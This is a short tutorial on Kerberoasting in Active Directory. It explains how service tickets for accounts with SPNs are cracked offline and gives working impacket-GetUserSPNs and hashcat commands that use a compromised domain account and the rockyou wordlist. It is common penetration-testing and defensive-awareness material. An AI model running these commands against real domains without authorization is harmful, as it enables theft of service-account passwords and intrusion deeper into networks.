Kerberoasting using Kali Linux

Kerberoasting is a technique attackers use in Windows Active Directory environments to recover service account passwords. Any authenticated domain user can ask the domain controller for a Kerberos service ticket (TGS) for any account that has a servicePrincipalName set. Part of that ticket is encrypted with a key derived from the service account's password (for the RC4-HMAC encryption type that key is simply the account's NT hash), so once an attacker obtains the ticket they can take it offline and try candidate passwords until one decrypts it correctly. The guessing itself generates no traffic to the domain controller; the only trace is the ticket request, which the DC logs as event 4769 just like every legitimate service ticket request. If the password is weak, the attacker ends up with the cleartext password of a service account, which often has elevated privileges. This makes kerberoasting a stealthy and powerful method for moving deeper into a network.

This only works against accounts that have a servicePrincipalName (SPN) set, and in practice against user accounts: computer accounts also have SPNs, but their passwords are long and random and will not crack. Tickets that come back encrypted with RC4 (etype 23) crack far faster than AES ones, so accounts that still allow RC4 are the best targets.

Example: in Active Directory Users and Computers, enable View > Advanced Features, open the user's Properties > Attribute Editor tab and look at servicePrincipalName. An SPN has the form service-class/hostname (for example HTTP/server.domain-name.local); any user object with a value in that attribute is a kerberoasting candidate.

How to run a Kerberoast from Kali (the impacket scripts are already installed)

# Use credentials from a compromised domain account; you are prompted
# for the password (or pass domain-name.local/username:password)
impacket-GetUserSPNs -dc-ip server-ip-address domain-name.local/username

# Request a service ticket for every SPN found and print the hashes
impacket-GetUserSPNs -dc-ip server-ip-address domain-name.local/username -request

# Save the $krb5tgs$... lines to a text file (or add -outputfile hash.txt above)
nano hash.txt

# Crack with hashcat. Mode 13100 is for RC4 tickets ($krb5tgs$23$);
# use 19600 for $krb5tgs$17$ (AES128) and 19700 for $krb5tgs$18$ (AES256)
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
